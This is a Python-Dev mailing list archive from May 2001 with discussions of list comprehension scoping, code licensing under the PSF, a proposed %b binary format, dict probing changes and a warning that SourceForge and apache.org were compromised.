References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> <LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com> <15124.64105.184857.499019@gargoyle.cs.uchicago.edu>
Message-ID: <20010530103630.B11580@gerg.ca>

On 30 May 2001, David Beazley said:
> In any case, I'm mostly just curious if anyone else has been bitten by
> the problem I've described.

For the record, I have not been bitten by this, but I probably don't use
list comps as much as you do.

I can completely sympathize with both your and Tim's point of view
here.  Both make perfect sense at the same time.  Hmmm.

"Do I contradict myself?
 Very well then I contradict myself,
 (I am large, I contain multitudes)"

        Greg
-- 
Greg Ward - Unix nerd                                   gward at python.net
http://starship.python.net/~gward/
Money is a powerful aphrodisiac.  But flowers work almost as well.


From barry at digicool.com  Wed May 30 17:07:12 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Wed, 30 May 2001 11:07:12 -0400
Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class 
 for threading
References: <thomas@xs4all.net>
	<20010530131424.Y690@xs4all.nl>
	<20010530122702.F3FE53B8999@snelboot.oratrix.nl>
Message-ID: <15125.3232.925401.563151@anthem.wooz.org>

>>>>> "TW" == Thomas Wouters <thomas at xs4all.net> writes:

    TW> The easiest solution would of course be for Itamar to get his
    TW> boss/lawyers to give us the right to relicence it under the
    TW> PSF licence :)

>>>>> "JJ" == Jack Jansen <jack at oratrix.nl> writes:

    JJ> I think this is the only viable solution. If various parts of
    JJ> Python have different license agreements this may well be a
    JJ> reason for people not to use Python because the hassle of
    JJ> figuring out which pieces fit their own licensing policy.

I completely agree.  IMO, the most important job of the PSF is to make
the Python IP sane again.  That means clearing as much of the existing
rights as possible, and releasing it under the NAIPL (New And Improved
Python License).  Any code that is licensed differently could mean
that it'll be ripped out of some re-distributions.  I'd be less
concerned about some ancillary module that few people use, and much
more concerned about some core piece of the code.

-Barry


From mal at lemburg.com  Wed May 30 21:57:17 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 30 May 2001 21:57:17 +0200
Subject: [Python-Dev] Autoconf problems on BeOS
Message-ID: <3B15509D.C790D5DF@lemburg.com>

I have a bug report assigned to myself which really is more
about autoconf than Unicode. The problem is that the
SIZEOF_xxx tests cause the Metroworks compiler on BeOS to
fail and this again causes these defines to be set to 0 !

Could someone with more autoconf experience please have a look ?

https://sourceforge.net/tracker/?func=detail&aid=420416&group_id=5470&atid=105470

Thanks,
-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From tim.one at home.com  Wed May 30 22:07:37 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 30 May 2001 16:07:37 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15124.64929.215666.745913@cj42289-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEGOKFAA.tim.one@home.com>

[Tim]
> Note that "the iterator variables" needn't be bare names:

[Fred]
>   I didn't realize this either.

You have to get your head out of the docs and read more code <wink>.

> I'm quite surprised by it, in fact, though I understand (I think) why
> it works that way.  But was this intentional?

I expect so.

> It seems like pure evil to me!

Sometimes it's the bee's knees; for example,

>>> digits = range(3)
>>> x = [None] * 3
>>> base3 = [x[:] for x[0] in digits for x[1] in digits for x[2] in digits]
>>> base3
[[0, 0, 0], [0, 0, 1], [0, 0, 2],
 [0, 1, 0], [0, 1, 1], [0, 1, 2],
 [0, 2, 0], [0, 2, 1], [0, 2, 2],
 [1, 0, 0], [1, 0, 1], [1, 0, 2],
 [1, 1, 0], [1, 1, 1], [1, 1, 2],
 [1, 2, 0], [1, 2, 1], [1, 2, 2],
 [2, 0, 0], [2, 0, 1], [2, 0, 2],
 [2, 1, 0], [2, 1, 1], [2, 1, 2],
 [2, 2, 0], [2, 2, 1], [2, 2, 2]]
>>>

I've done stuff "like that" often, albeit via the nested-loop spelling.

> I'd only expect it to support bare names and sequence unpacking (with
> only bare names at the "edge" of all nested unpackings).

It's too late to take it away now!  Python always worked this way.  And it's
really got nothing to do with what implementing what David wants (e.g., the
lambda transformation I mentioned preserves its semantics) -- apart from (I
hope) driving home that changes need to be considered very carefully.


From tim.one at home.com  Wed May 30 22:22:19 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 30 May 2001 16:22:19 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEGPKFAA.tim.one@home.com>

[David Beazley, pretty much repeats why he doesn't like the current scheme]

I hoped it was clear the first time I was at least half sympathetic!  If it
wasn't, I am <wink>.

>> >>> i = 12
>> >>> (lambda: [i**2 for i in range(4)])()
>> [0, 1, 4, 9]
>> >>> i
>> 12
>> >>>
>>
>> That's more like Haskell does it.

> Ah yes, well this is exactly the kind of behavior that seems most
> natural to me.   It's also the behavior that everyone expected went I
> went around to the various Python hackers in the department and asked
> them about it yesterday.

I believe that.

> I suppose I could just write this:
>
>   a = (lambda s: [2*i for i in s])(s)
>
> However, that's pretty ugly.

It's too complicated, isn't it?  In the presence of nested scopes (which are
reality in 2.2),

    a = (lambda: [2*i for i in s])()

does the same thing and is conceptually clearer.  I'm not suggesting that
you actually write that, but view it as a *model* for your intended
semantics.  I wouldn't want to see the implementation actually use a lambda
under the covers, either, but we need some crisp way to explain the intent.
Note that the lambda-trick *model* "does the right thing" for for-loop
targets like x.i and x[i] too.

> In any case, I'm mostly just curious if anyone else has been bitten by
> the problem I've described.  I would certainly love to see a fix for
> it (I would even volunteer to work on a prototype implementation if
> there is interest).

I encourage that, but since it's not 100% backward-compatible you'll enjoy
the usual range of hysterical <wink> opposition.  Needs a PEP, and possibly
even an associated future-statement.  Overall, I'm more in favor of changing
it than not.


From skip at pobox.com  Wed May 30 22:48:47 2001
From: skip at pobox.com (Skip Montanaro)
Date: Wed, 30 May 2001 15:48:47 -0500
Subject: [Python-Dev] scoping and list comprehensions
Message-ID: <15125.23727.168431.762320@beluga.mojam.com>

Regarding the issue of how list comprehensions should relate to their
environment, perhaps instead of modifying list comprehensions to make them
execute in new local scopes (or at least appear to) a better solution would
be to allow a new local scope to be introduced inline, sort of like in C:

    {
        int i;
	for (i=0; i < 10; i++) {
            dostuffwith(i);
	}
    }

While this might be used more for list comprehensions than other constructs,
I'm sure people will find a way to (ab)use it for other things as well.  I
don't see an obvious way of adding such functionality to Python without
introducing a new keyword though, which is going to make it difficult to get
past Guido:

    l = []
    scope:
        l = [i**2 for i in range(10)]
    print l

Hmmm, wait a minute, what if you terminated a block introducer (if or while
clause or try/except clauses) with something other than a colon?  (I'm just
thinking out loud, I don't think this is necessarily a good solution).

    if 1:		# no new scope introduced
        l = [i**2 for i in range(10)]
    print l

vs.

    if 1;		# new scope introduced for enclosed block
        l = [i**2 for i in range(10)]
    print l

That certainly has some line noise qualities about it, especially since
colons and semicolons are visually so similar, but does offer an alternative
to introducing a new keyword into the language.

Hmmm, wait another minute, perhaps you could simply overload def:

    l = []
    def:
        l = [i**2 for i in range(10)]
    print l

There's also the problem of how to export results from the scope, though
perhaps the new nested scope stuff provides a solution to that.  (I've
ignored them so far, so I can't tell...)

Would it be possible for the compiler to recognize the degenerate def: and
simply mangle any names that would clash instead of introducing an actual
new execution frame?  The above might be equivalent to

    l = []
    l = [__mangled_i**2 for __mangled_i in range(10)]
    print l

if 'i' already existed in the same scope.

Just thinking out loud.  I'm not sure any of these ideas is any better than
the current state of affairs.

Skip


From Greg.Wilson at baltimore.com  Wed May 30 23:11:16 2001
From: Greg.Wilson at baltimore.com (Greg Wilson)
Date: Wed, 30 May 2001 17:11:16 -0400
Subject: [Python-Dev] %b format?
Message-ID: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com>

I would like to add a "%b" format for converting
numbers to binary format (1's and 0's).  I realize
this isn't a C-ism, but it would be very useful for
teaching purposes, as newcomers find 101101 a lot
easier to understand than 0x2D.

Reactions?

Greg


-----------------------------------------------------------------------------------------------------------------
The information contained in this message is confidential and is intended 
for the addressee(s) only.  If you have received this message in error or 
there are any problems please notify the originator immediately.  The 
unauthorized use, disclosure, copying or alteration of this message is 
strictly forbidden. Baltimore Technologies plc will not be liable for direct, 
special, indirect or consequential damages arising from alteration of the 
contents of this message by a third party or as a result of any virus being 
passed on.

In addition, certain Marketing collateral may be added from time to time to 
promote Baltimore Technologies products, services, Global e-Security or 
appearance at trade shows and conferences.
 
This footnote confirms that this email message has been swept by 
Baltimore MIMEsweeper for Content Security threats, including
computer viruses.


From esr at thyrsus.com  Wed May 30 23:28:38 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 17:28:38 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com>; from Greg.Wilson@baltimore.com on Wed, May 30, 2001 at 05:11:16PM -0400
References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com>
Message-ID: <20010530172838.A778@thyrsus.com>

Greg Wilson <Greg.Wilson at baltimore.com>:
> I would like to add a "%b" format for converting
> numbers to binary format (1's and 0's).  I realize
> this isn't a C-ism, but it would be very useful for
> teaching purposes, as newcomers find 101101 a lot
> easier to understand than 0x2D.
> 
> Reactions?

+1.  Didactically pretty useful, and the additional code won't boost
global complexity much.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

Where rights secured by the Constitution are involved, there can be no
rule making or legislation which would abrogate them.
        -- Miranda vs. Arizona, 384 US 436 p. 491


From tim.one at home.com  Wed May 30 23:30:49 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 30 May 2001 17:30:49 -0400
Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading
In-Reply-To: <20010530131424.Y690@xs4all.nl>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEHDKFAA.tim.one@home.com>

[Thomas Wouters]
> This raises an interesting point. Do we want separate pieces of the
> Python distribution to have separate licences ?

This is a question for the PSF to resolve, since the PSF is intended to
become the sole legal owner of Python's IP rights.

My position will be that nothing ships in the distribution unless copyright
has been assigned to the PSF, or the contributor has agreed to give the PSF
a non-exclusive irrevocable etc license to release their work under the PSF
license du jour.  Fleshing out the second option so as to prevent abuse on
either side is going to require significant effort ("what if the PSF goes
away?", "what if the PSF changes its license to something I hate?", "what if
I change my mind?", etc).

Unfortunately, significant effort takes significant time too, and nobody has
started on this yet.


From mal at lemburg.com  Wed May 30 23:31:06 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 30 May 2001 23:31:06 +0200
Subject: [Python-Dev] %b format?
References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> <20010530172838.A778@thyrsus.com>
Message-ID: <3B15669A.43B70A44@lemburg.com>

"Eric S. Raymond" wrote:
> 
> Greg Wilson <Greg.Wilson at baltimore.com>:
> > I would like to add a "%b" format for converting
> > numbers to binary format (1's and 0's).  I realize
> > this isn't a C-ism, but it would be very useful for
> > teaching purposes, as newcomers find 101101 a lot
> > easier to understand than 0x2D.
> >
> > Reactions?
> 
> +1.  Didactically pretty useful, and the additional code won't boost
> global complexity much.

Good idea. The only question I have is: in which order will
you print the 0s and 1s (MSB->LSB, LSB->MSB, little/big endian) ?

I am thinking of adding a bit field type to mxNumber and have
the same problem there...

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From esr at thyrsus.com  Wed May 30 23:42:22 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 17:42:22 -0400
Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEHDKFAA.tim.one@home.com>; from tim.one@home.com on Wed, May 30, 2001 at 05:30:49PM -0400
References: <20010530131424.Y690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEHDKFAA.tim.one@home.com>
Message-ID: <20010530174222.A1019@thyrsus.com>

Tim Peters <tim.one at home.com>:
> My position will be that nothing ships in the distribution unless copyright
> has been assigned to the PSF, or the contributor has agreed to give the PSF
> a non-exclusive irrevocable etc license to release their work under the PSF
> license du jour.  Fleshing out the second option so as to prevent abuse on
> either side is going to require significant effort ("what if the PSF goes
> away?", "what if the PSF changes its license to something I hate?", "what if
> I change my mind?", etc).
> 
> Unfortunately, significant effort takes significant time too, and nobody has
> started on this yet.

I think a PSF pleadge to use only an OSI-certified license would address
some of these issues.  Write it into the bylaws if necessary.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

He that would make his own liberty secure must guard even his enemy from
oppression: for if he violates this duty, he establishes a precedent that
will reach unto himself.
	-- Thomas Paine


From esr at thyrsus.com  Wed May 30 23:44:57 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 17:44:57 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <3B15669A.43B70A44@lemburg.com>; from mal@lemburg.com on Wed, May 30, 2001 at 11:31:06PM +0200
References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> <20010530172838.A778@thyrsus.com> <3B15669A.43B70A44@lemburg.com>
Message-ID: <20010530174457.B1019@thyrsus.com>

M.-A. Lemburg <mal at lemburg.com>:
> > > I would like to add a "%b" format for converting
> > > numbers to binary format (1's and 0's).  I realize
> > > this isn't a C-ism, but it would be very useful for
> > > teaching purposes, as newcomers find 101101 a lot
> > > easier to understand than 0x2D.
> > 
> > +1.  Didactically pretty useful, and the additional code won't boost
> > global complexity much.
> 
> Good idea. The only question I have is: in which order will
> you print the 0s and 1s (MSB->LSB, LSB->MSB, little/big endian) ?
> 
> I am thinking of adding a bit field type to mxNumber and have
> the same problem there...

For *this* context, we clearly want mathematical notation; MSB to the right
and no byte-swapping.  After all we'd actually be printing numerals, not 
dumping a bitfield.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

The people of the various provinces are strictly forbidden to have in their
possession any swords, short swords, bows, spears, firearms, or other types
of arms. The possession of unnecessary implements makes difficult the
collection of taxes and dues and tends to foment uprisings.
        -- Toyotomi Hideyoshi, dictator of Japan, August 1588


From barry at digicool.com  Wed May 30 23:49:22 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Wed, 30 May 2001 17:49:22 -0400
Subject: [Python-Dev] %b format?
References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com>
Message-ID: <15125.27362.431144.886216@anthem.wooz.org>

>>>>> "GW" == Greg Wilson <Greg.Wilson at baltimore.com> writes:

    GW> I would like to add a "%b" format for converting numbers to
    GW> binary format (1's and 0's).

For completeness, wouldn't you also want a binary integer literal so
your students could write binary numbers in their code?  And what
about a binary() operator a la hex()?

-Barry


From tim.one at home.com  Wed May 30 23:50:31 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 30 May 2001 17:50:31 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <3B15669A.43B70A44@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEHFKFAA.tim.one@home.com>

[Greg Wilson]
> I would like to add a "%b" format for converting
> numbers to binary format (1's and 0's).

-0, due to compound lumpiness:  hex() is to %x is to __hex__ as oct() is to
%o is to __oct__ as nothing is to %b is to nothing.  In that respect it's
unfortunate that Python has distinct nb_oct and nb_hex slots in the
PyNumberMethods struct (as opposed to a single parameterized "convert to
base N string" method).

[MAL]
> Good idea. The only question I have is: in which order will
> you print the 0s and 1s (MSB->LSB, LSB->MSB, little/big endian) ?

I'm sure Greg has in mind only integers, in which case %x and %o already
give the only useful <wink> answer.


From fdrake at cj42289-a.reston1.va.home.com  Wed May 30 23:51:22 2001
From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake)
Date: Wed, 30 May 2001 17:51:22 -0400 (EDT)
Subject: [Python-Dev] [development doc updates]
Message-ID: <20010530215122.3738C28849@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

    http://python.sourceforge.net/devel-docs/

Update for development version of Python (2.2).

This update substantially re-works the prototype support for
productions of a formal grammar.  They look better, support forward
references to symbol definitions, and allow download of an all-text
version of the complete grammar (with productions ordered the same way
as they are in the documentation sources).

"Documeting Python" now includes documentation for the LaTeX markup
used to describe productions:

    http://python.sourceforge.net/devel-docs/doc/grammar-displays.html


From esr at thyrsus.com  Thu May 31 00:05:09 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 18:05:09 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEHFKFAA.tim.one@home.com>; from tim.one@home.com on Wed, May 30, 2001 at 05:50:31PM -0400
References: <3B15669A.43B70A44@lemburg.com> <LNBBLJKPBEHFEDALKOLCGEHFKFAA.tim.one@home.com>
Message-ID: <20010530180509.B1305@thyrsus.com>

Tim Peters <tim.one at home.com>:
> -0, due to compound lumpiness:  hex() is to %x is to __hex__ as oct() is to
> %o is to __oct__ as nothing is to %b is to nothing.  In that respect it's
> unfortunate that Python has distinct nb_oct and nb_hex slots in the
> PyNumberMethods struct (as opposed to a single parameterized "convert to
> base N string" method).

Is the right answer to add the convert-to-base slot and deprecate the
other two?
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

If gun laws in fact worked, the sponsors of this type of legislation
should have no difficulty drawing upon long lists of examples of
criminal acts reduced by such legislation. That they cannot do so
after a century and a half of trying -- that they must sweep under the
rug the southern attempts at gun control in the 1870-1910 period, the
northeastern attempts in the 1920-1939 period, the attempts at both
Federal and State levels in 1965-1976 -- establishes the repeated,
complete and inevitable failure of gun laws to control serious crime.
        -- Senator Orrin Hatch, in a 1982 Senate Report


From fdrake at acm.org  Thu May 31 00:00:15 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Wed, 30 May 2001 18:00:15 -0400 (EDT)
Subject: [Python-Dev] Most recent documentation update
Message-ID: <15125.28015.611763.968854@cj42289-a.reston1.va.home.com>

  One thing I forgot to mention in my announcement of the update to
the development documnetation which I just posted is that I went ahead
and converted all but one of the productions in the Reference Manual
to the new markup.  The print_stmt production, unfortunately, is given
twice instead of using a single model for the statement.  The
formatting tools don't support that (yet), and it's not clear that
they should.
  (No, Barry, don't go changing it...!)


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From esr at thyrsus.com  Thu May 31 00:03:41 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 18:03:41 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <15125.27362.431144.886216@anthem.wooz.org>; from barry@digicool.com on Wed, May 30, 2001 at 05:49:22PM -0400
References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> <15125.27362.431144.886216@anthem.wooz.org>
Message-ID: <20010530180341.A1305@thyrsus.com>

Barry A. Warsaw <barry at digicool.com>:
> 
> >>>>> "GW" == Greg Wilson <Greg.Wilson at baltimore.com> writes:
> 
>     GW> I would like to add a "%b" format for converting numbers to
>     GW> binary format (1's and 0's).
> 
> For completeness, wouldn't you also want a binary integer literal so
> your students could write binary numbers in their code?  And what
> about a binary() operator a la hex()?

Barry is correct.  If we're going to do this, we ought to do it right and
support binary on a par with decimal, hex, and octal.  I favor this.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

The direct use of physical force is so poor a solution to the problem of
limited resources that it is commonly employed only by small children and
great nations.
	-- David Friedman


From barry at digicool.com  Thu May 31 00:05:37 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Wed, 30 May 2001 18:05:37 -0400
Subject: [Python-Dev] Most recent documentation update
References: <15125.28015.611763.968854@cj42289-a.reston1.va.home.com>
Message-ID: <15125.28337.938136.505675@anthem.wooz.org>

>>>>> "Fred" == Fred L Drake, Jr <fdrake at acm.org> writes:

    Fred> (No, Barry, don't go changing it...!)

Oh darn, three whole days work wasted...

:)


From tim.one at home.com  Thu May 31 00:17:42 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 30 May 2001 18:17:42 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <15125.27362.431144.886216@anthem.wooz.org>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEHIKFAA.tim.one@home.com>

Note that in Vyper (John Skaller's Python variant) these are legit integer
literals:

0b11111111 0B11111111
0o777      0O777
0d999      0D999
0xfFf      0XFFf

Vyper's octal notation is still ugly, but whoever first thought

    0777 != 777

was a "good idea" was certifiably insane <0.25 wink>.


From tim.one at home.com  Thu May 31 00:29:33 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 30 May 2001 18:29:33 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <20010530180509.B1305@thyrsus.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEHJKFAA.tim.one@home.com>

[Eric S. Raymond]
> Is the right answer to add the convert-to-base slot and deprecate the
> other two?

That would fix "the other" lump here in Python, that e.g.

>>> int("111", 3)
13
>>>

has no inverse.  string->int is happy with any base in 2..36 inclusive, but
int->string is spelled via 3 different builtins covering only 3 of those
bases.

It would be more *expedient* to add "just" a __bin__/nb_bin method + a way
to spell binary int literals + a %b format + a bin() builtin.

On the fifth hand, I doubt anyone would want to add new % format codes for
bases {2..36} - {2, 8, 10, 16}.

So it will remain lumpy no matter what.  I look forward to the PEP <wink>.


From esr at thyrsus.com  Thu May 31 00:38:33 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 18:38:33 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEHIKFAA.tim.one@home.com>; from tim.one@home.com on Wed, May 30, 2001 at 06:17:42PM -0400
References: <15125.27362.431144.886216@anthem.wooz.org> <LNBBLJKPBEHFEDALKOLCKEHIKFAA.tim.one@home.com>
Message-ID: <20010530183833.B1654@thyrsus.com>

Tim Peters <tim.one at home.com>:
> Vyper's octal notation is still ugly, but whoever first thought
> 
>     0777 != 777
> 
> was a "good idea" was certifiably insane <0.25 wink>.

For anyone who doesn't know the history behind this...  

The 0xxx notation was copied from PDP-11 assembler literals -- the
instruction-set design of the PDP-11 was such that most of the
instruction subfields fit in octal digits, so this convention made it
somewhat easier to read machine-code dumps.

While I'm at it, I should note that the design of the 11 was ancestral
to both the 8088 and 68000 microprocessors, and thus to essentially 
every new general-purpose computer designed in the last fifteen years.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

"Are we to understand," asked the judge, "that you hold your own interests
above the interests of the public?"

"I hold that such a question can never arise except in a society of cannibals."
	-- Ayn Rand


From esr at thyrsus.com  Thu May 31 00:39:43 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 18:39:43 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIEHJKFAA.tim.one@home.com>; from tim.one@home.com on Wed, May 30, 2001 at 06:29:33PM -0400
References: <20010530180509.B1305@thyrsus.com> <LNBBLJKPBEHFEDALKOLCIEHJKFAA.tim.one@home.com>
Message-ID: <20010530183943.C1654@thyrsus.com>

Tim Peters <tim.one at home.com>:
> [Eric S. Raymond]
> > Is the right answer to add the convert-to-base slot and deprecate the
> > other two?
> 
> That would fix "the other" lump here in Python, that e.g.
> 
> >>> int("111", 3)
> 13
> >>>
> 
> has no inverse.  string->int is happy with any base in 2..36 inclusive, but
> int->string is spelled via 3 different builtins covering only 3 of those
> bases.

That sounds like a strong argument to me.  
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

The world is filled with violence. Because criminals carry guns, we
decent law-abiding citizens should also have guns. Otherwise they will
win and the decent people will lose.
        -- James Earl Jones


From nas at python.ca  Thu May 31 00:38:58 2001
From: nas at python.ca (Neil Schemenauer)
Date: Wed, 30 May 2001 15:38:58 -0700
Subject: [Python-Dev] %b format?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEHIKFAA.tim.one@home.com>; from tim.one@home.com on Wed, May 30, 2001 at 06:17:42PM -0400
References: <15125.27362.431144.886216@anthem.wooz.org> <LNBBLJKPBEHFEDALKOLCKEHIKFAA.tim.one@home.com>
Message-ID: <20010530153858.A21901@glacier.fnational.com>

Tim Peters wrote:
> Vyper's octal notation is still ugly, but whoever first thought
> 
>     0777 != 777
> 
> was a "good idea" was certifiably insane <0.25 wink>.

Ever used MacLisp or ZetaLisp?  There:

    777 == 0d511

If only we had been born with 8 or 16 fingers, right?

  Neil


From thomas at xs4all.net  Thu May 31 03:52:48 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Thu, 31 May 2001 03:52:48 +0200
Subject: [Python-Dev] SF hacked
Message-ID: <20010531035248.G690@xs4all.nl>

It *seems*, from this site:

http://66.92.75.28/~vladimir/themes-org.html

that SourceForge has been hacked, and more seriously than SF first admits
(if I'm to believe the arrogant sprouting of some script-kiddie, anyway. :)
And the same goes for apache.org, it looks like. Anyway, if anyone connected
*from* any of sourceforge's machines to anywhere else, in the last couple of
months, they'll be well advised to change their passwords and check for
intruders. The same goes if you connect through ssh and (foolishly ;)
allowed ssh-agent-forwarding to the SF machines. In that case, better check
all the machines that ssh-agent would give you unpassworded access to for
logins you don't recognize. The site above lists a number of sniffed
passwords, in case you want to check, but there's no reason for the hacker
not to have even more sniffed passwords lying about :)

And if you have a login on apache.org, you probably want to change your
password in any case.... the above listed site has what seems to be a copy
of the shadow password file.

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From tim.one at home.com  Thu May 31 05:53:53 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 30 May 2001 23:53:53 -0400
Subject: [Python-Dev] One more dict trick
Message-ID: <LNBBLJKPBEHFEDALKOLCGEIFKFAA.tim.one@home.com>

If anyone has an app known or suspected to be sensitive to dict timing,
please try the patch here.  Best I've been able to tell, it's a win.  But
it's a radical change in approach, so I don't want to rush it.

This gets rid of the polynomial machinery entirely, along with the branches
associated with updating the things, and the dictobject struct member
holding the table's poly.  Instead it relies on that

    i = (5*i + 1) % n

is a full-period RNG whenever n is a power of 2 (that's what guarantees it
will visit every slot), but perturbs that by adding in a few bits from the
full hash code shifted right each time (that's what guarantees every bit of
the hash code eventually influences the probe sequence, avoiding simple
quadratic-time degenerate cases).
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: dict.txt
URL: <http://mail.python.org/pipermail/python-dev/attachments/20010530/11ef83d8/attachment-0001.txt>

From tim.one at home.com  Thu May 31 06:46:56 2001
From: tim.one at home.com (Tim Peters)
Date: Thu, 31 May 2001 00:46:56 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <20010530183833.B1654@thyrsus.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEIHKFAA.tim.one@home.com>

[ESR]
> The 0xxx notation was copied from PDP-11 assembler literals -- the
> instruction-set design of the PDP-11 was such that most of the
> instruction subfields fit in octal digits, so this convention made it
> somewhat easier to read machine-code dumps.

That doesn't mean they weren't certifiably insane.  At Cray, we had a much
more sensible convention:  *all* numbers were octal (yes, it was a 64-bit
box and octal didn't make any sense, but Seymour Cray got used to it from
the 60-bit CDC w/ 18-bit address registers and didn't feel like changing).
My first boss there loved telling the story about he was out for a drive
with the family, and excitedly screamed "Hey, kids!  Look!  The odometer is
just about to change to 40,000!".  Of course it read 37,777.9 at the time,
and they thought he was nuts.  That's where this kind of thing always leads
in the end.

to-disgrace-despair-and-eventually-ruin-ly y'rs  - tim


From tim.one at home.com  Thu May 31 06:48:28 2001
From: tim.one at home.com (Tim Peters)
Date: Thu, 31 May 2001 00:48:28 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <20010530153858.A21901@glacier.fnational.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEIHKFAA.tim.one@home.com>

[Neil Schemenauer]
> Ever used MacLisp or ZetaLisp?  There:
>
>     777 == 0d511
>
> If only we had been born with 8 or 16 fingers, right?

Then guys would probably be attracted to base 9 or 17.

sorry-for-that-but-i-felt-it-was-expected-of-me-ly y'rs  - tim


From greg at cosc.canterbury.ac.nz  Thu May 31 07:15:24 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 31 May 2001 17:15:24 +1200 (NZST)
Subject: [Python-Dev] scoping and list comprehensions
In-Reply-To: <15125.23727.168431.762320@beluga.mojam.com>
Message-ID: <200105310515.RAA01757@s454.cosc.canterbury.ac.nz>

Skip:

>    scope:
>        l = [i**2 for i in range(10)]

By analogy with C, the introducer of a new scope should
simply be an unadorned colon:

  :
    l = [i**2 for i in range(10)]

:-)

While this might be useful, it doesn't really address the issue
raised, because we really need a new scope per listcomp (or
maybe even each 'for' in the listcomp).

> There's also the problem of how to export results from the scope, though
> perhaps the new nested scope stuff provides a solution to that.

Nope -- there's still no way to assign to any name in
an intermediate scope. Something heretical, such as
declarations, would be needed.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From greg at cosc.canterbury.ac.nz  Thu May 31 07:16:11 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 31 May 2001 17:16:11 +1200 (NZST)
Subject: [Python-Dev] Iteration variables and list comprehensions
